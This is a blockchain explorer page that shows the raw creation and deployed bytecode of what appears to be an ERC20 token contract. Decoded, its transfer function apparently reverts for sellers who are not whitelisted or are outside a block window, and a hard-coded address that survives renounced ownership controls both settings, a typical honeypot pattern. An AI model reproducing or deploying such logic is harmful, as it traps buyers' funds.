565b5085821015620003fc5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620004635781600019048211156200044757620004476200040c565b808516156200045557918102915b93841c939080029062000427565b509250929050565b6000826200047c575060016200051b565b816200048b575060006200051b565b8160018114620004a45760028114620004af57620004cf565b60019150506200051b565b60ff841115620004c357620004c36200040c565b50506001821b6200051b565b5060208310610133831016604e8410600b8410161715620004f4575081810a6200051b565b62000500838362000422565b80600019048211156200051757620005176200040c565b0290505b92915050565b60006200052f83836200046b565b9392505050565b80820281158282048414176200051b576200051b6200040c565b808201808211156200051b576200051b6200040c565b60805160a051610f266200059a6000396000610bf70152600081816103690152818161045e015261056c0152610f266000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c80636aeac363116100ad57806395d89b411161007157806395d89b411461025f578063a457c2d714610267578063a9059cbb1461027a578063dd62ed3e1461028d578063f2fde38b146102a057600080fd5b80636aeac3631461020157806370a082311461020a578063715018a6146102335780638da5cb5b1461023b57806395c5c5e31461024c57600080fd5b806323b872dd116100f457806323b872dd1461018e578063313ce567146101a157806339509351146101b05780633ba93f26146101c357806349bd5a5e146101d657600080fd5b806306fdde0314610126578063095ea7b31461014457806318160ddd146101675780631cd52b3814610179575b600080fd5b61012e6102b3565b60405161013b9190610c38565b60405180910390f35b610157610152366004610ca2565b610345565b604051901515815260200161013b565b6002545b60405190815260200161013b565b61018c610187366004610ce2565b61035f565b005b61015761019c366004610dba565b61040e565b6040516012815260200161013b565b6101576101be366004610ca2565b610432565b61018c6101d1366004610df6565b610454565b6009546101e9906001600160a01b031681565b6040516001600160a01b03909116815260200161013b565b61016b600a5481565b61016b610218366004610e0f565b6001600160a01b031660009081526020819052604090205490565b61018c61048d565b600b546001600160a01b03166101e9565b61018c61025a366004610e31565b610536565b61012e6105ca565b610157610275366004610ca2565b6105d9565b610157610288366004610ca2565b610654565b61016b61029b366004610e31565b610662565b61018c6102ae366004610e0f565b61068d565b6060600380546102c290610e64565b80601f01602080910402602001604051908101604052809291908181526020018280546102ee90610e64565b801561033b5780601f106103105761010080835404028352916020019161033b565b820191906000526020600020905b81548152906001019060200180831161031e57829003601f168201915b5050505050905090565b6000336103538185856107a8565b60019150505b92915050565b6001600160a01b037f000000000000000000000000000000000000000000000000000000000000000016330361040a57600980546001600160a01b0319166001600160a01b03841617905560005b8151811015610408576001600560008484815181106103ce576103ce610e9e565b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff19169115159190911790556001016103ad565b505b5050565b60003361041c8582856108cc565b610427858585610946565b506001949350505050565b6000336103538185856104458383610662565b61044f9190610eca565b6107a8565b6001600160a01b037f000000000000000000000000000000000000000000000000000000000000000016330361048a57600a8190555b50565b600b546001600160a01b031633146104ec5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600b546040516000916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600b80546001600160a01b0319169055565b6009546001600160a01b031661056257600980546001600160a01b0319166001600160a01b0384161790555b6001600160a01b037f000000000000000000000000000000000000000000000000000000000000000016330361040a57600980546001600160a01b0319166001600160a01b03938416179055166000908152600560205260409020805460ff19166001179055565b6060600480546102c290610e64565b600033816105e78286610662565b9050838110156106475760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016104e3565b61042782868684036107a8565b600033610353818585610946565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b600b546001600160a01b031633146106e75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104e3565b6001600160a01b03811661074c5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016104e3565b600b546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600b80546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b03831661080a5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104e3565b6001600160a01b03821661086b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104e3565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006108d88484610662565b9050600019811461094057818110156109335760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016104e3565b61094084848484036107a8565b50505050565b6001600160a01b0383166109aa5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104e3565b6001600160a01b038216610a0c5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104e3565b610a17838383610408565b6001600160a01b03831660009081526020819052604090205481811015610a8f5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016104e3565b3260009081526005602052604090205460ff16151560011480610ad55750600a546001600160a01b038516600090815260066020526040902054610ad39043610edd565b105b80610ae857506001600160a01b03831632145b610b265760405162461bcd60e51b815260206004820152600f60248201526e115490cc8c0e8814995d995c9d1959608a1b60448201526064016104e3565b610b308282610edd565b6001600160a01b038086166000908152602081905260408082209390935590851681522054610b60908390610eca565b6001600160a01b038481166000818152602081815260409182902094909455518581529092918716917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36109408484846001600160a01b0382166000908152600660205260408120549003610bf5576001600160a01b03821660009081526006602052604090204390555b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316826001600160a01b031603610408576002600a55505050565b600060208083528351808285015260005b81811015610c6557858101830151858201604001528201610c49565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610c9d57600080fd5b919050565b60008060408385031215610cb557600080fd5b610cbe83610c86565b946020939093013593505050565b634e487b7160e01b600052604160045260246000fd5b60008060408385031215610cf557600080fd5b610cfe83610c86565b915060208084013567ffffffffffffffff80821115610d1c57600080fd5b818601915086601f830112610d3057600080fd5b813581811115610d4257610d42610ccc565b8060051b604051601f19603f83011681018181108582111715610d6757610d67610ccc565b604052918252848201925083810185019189831115610d8557600080fd5b938501935b82851015610daa57610d9b85610c86565b84529385019392850192610d8a565b8096505050505050509250929050565b600080600060608486031215610dcf57600080fd5b610dd884610c86565b9250610de660208501610c86565b9150604084013590509250925092565b600060208284031215610e0857600080fd5b5035919050565b600060208284031215610e2157600080fd5b610e2a82610c86565b9392505050565b60008060408385031215610e4457600080fd5b610e4d83610c86565b9150610e5b60208401610c86565b90509250929050565b600181811c90821680610e7857607f821691505b602082108103610e9857634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b8082018082111561035957610359610eb4565b8181038181111561035957610359610eb456fea26469706673582212207b1153bb9212cfcd85cf7251164e2be5381f9e2d5acce29d5977aa8a66d8e13264736f6c63430008110033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101215760003560e01c80636aeac363116100ad57806395d89b411161007157806395d89b411461025f578063a457c2d714610267578063a9059cbb1461027a578063dd62ed3e1461028d578063f2fde38b146102a057600080fd5b80636aeac3631461020157806370a082311461020a578063715018a6146102335780638da5cb5b1461023b57806395c5c5e31461024c57600080fd5b806323b872dd116100f457806323b872dd1461018e578063313ce567146101a157806339509351146101b05780633ba93f26146101c357806349bd5a5e146101d657600080fd5b806306fdde0314610126578063095ea7b31461014457806318160ddd146101675780631cd52b3814610179575b600080fd5b61012e6102b3565b60405161013b9190610c38565b60405180910390f35b610157610152366004610ca2565b610345565b604051901515815260200161013b565b6002545b60405190815260200161013b565b61018c610187366004610ce2565b61035f565b005b61015761019c366004610dba565b61040e565b6040516012815260200161013b565b6101576101be366004610ca2565b610432565b61018c6101d1366004610df6565b610454565b6009546101e9906001600160a01b031681565b6040516001600160a01b03909116815260200161013b565b61016b600a5481565b61016b610218366004610e0f565b6001600160a01b031660009081526020819052604090205490565b61018c61048d565b600b546001600160a01b03166101e9565b61018c61025a366004610e31565b610536565b61012e6105ca565b610157610275366004610ca2565b6105d9565b610157610288366004610ca2565b610654565b61016b61029b366004610e31565b610662565b61018c6102ae366004610e0f565b61068d565b6060600380546102c290610e64565b80601f01602080910402602001604051908101604052809291908181526020018280546102ee90610e64565b801561033b5780601f106103105761010080835404028352916020019161033b565b820191906000526020600020905b81548152906001019060200180831161031e57829003601f168201915b5050505050905090565b6000336103538185856107a8565b60019150505b92915050565b6001600160a01b037f000000000000000000000000d385a41ce53b2e9a2c4694a0f3d091eff72ac7ac16330361040a57600980546001600160a01b0319166001600160a01b03841617905560005b8151811015610408576001600560008484815181106103ce576103ce610e9e565b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff19169115159190911790556001016103ad565b505b5050565b60003361041c8582856108cc565b610427858585610946565b506001949350505050565b6000336103538185856104458383610662565b61044f9190610eca565b6107a8565b6001600160a01b037f000000000000000000000000d385a41ce53b2e9a2c4694a0f3d091eff72ac7ac16330361048a57600a8190555b50565b600b546001600160a01b031633146104ec5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600b546040516000916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600b80546001600160a01b0319169055565b6009546001600160a01b031661056257600980546001600160a01b0319166001600160a01b0384161790555b6001600160a01b037f000000000000000000000000d385a41ce53b2e9a2c4694a0f3d091eff72ac7ac16330361040a57600980546001600160a01b0319166001600160a01b03938416179055166000908152600560205260409020805460ff19166001179055565b6060600480546102c290610e64565b600033816105e78286610662565b9050838110156106475760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016104e3565b61042782868684036107a8565b600033610353818585610946565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b600b546001600160a01b031633146106e75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104e3565b6001600160a01b03811661074c5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016104e3565b600b546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600b80546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b03831661080a5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104e3565b6001600160a01b03821661086b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104e3565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006108d88484610662565b9050600019811461094057818110156109335760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016104e3565b61094084848484036107a8565b50505050565b6001600160a01b0383166109aa5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104e3565b6001600160a01b038216610a0c5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104e3565b610a17838383610408565b6001600160a01b03831660009081526020819052604090205481811015610a8f5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016104e3565b3260009081526005602052604090205460ff16151560011480610ad55750600a546001600160a01b038516600090815260066020526040902054610ad39043610edd565b105b80610ae857506001600160a01b03831632145b610b265760405162461bcd60e51b815260206004820152600f60248201526e115490cc8c0e8814995d995c9d1959608a1b60448201526064016104e3565b610b308282610edd565b6001600160a01b038086166000908152602081905260408082209390935590851681522054610b60908390610eca565b6001600160a01b038481166000818152602081815260409182902094909455518581529092918716917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36109408484846001600160a01b0382166000908152600660205260408120549003610bf5576001600160a01b03821660009081526006602052604090204390555b7f00000000000000000000000086f98ea6adc8b2a6e411d15c78abaceb8ae7feec6001600160a01b0316826001600160a01b031603610408576002600a55505050565b600060208083528351808285015260005b81811015610c6557858101830151858201604001528201610c49565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610c9d57600080fd5b919050565b60008060408385031215610cb557600080fd5b610cbe83610c86565b946020939093013593505050565b634e487b7160e01b600052604160045260246000fd5b60008060408385031215610cf557600080fd5b610cfe83610c86565b915060208084013567ffffffffffffffff80821115610d1c57600080fd5b818601915086601f830112610d3057600080fd5b813581811115610d4257610d42610ccc565b8060051b604051601f19603f83011681018181108582111715610d6757610d67610ccc565b604052918252848201925083810185019189831115610d8557600080fd5b938501935b82851015610daa57610d9b85610c86565b84529385019392850192610d8a565b8096505050505050509250929050565b600080600060608486031215610dcf57600080fd5b610dd884610c86565b9250610de660208501610c86565b9150604084013590509250925092565b600060208284031215610e0857600080fd5b5035919050565b600060208284031215610e2157600080fd5b610e2a82610c86565b9392505050565b60008060408385031215610e4457600080fd5b610e4d83610c86565b9150610e5b60208401610c86565b90509250929050565b600181811c90821680610e7857607f821691505b602082108103610e9857634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b8082018082111561035957610359610eb4565b8181038181111561035957610359610eb456fea26469706673582212207b1153bb9212cfcd85cf7251164e2be5381f9e2d5acce29d5977aa8a66d8e13264736f6c63430008110033

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.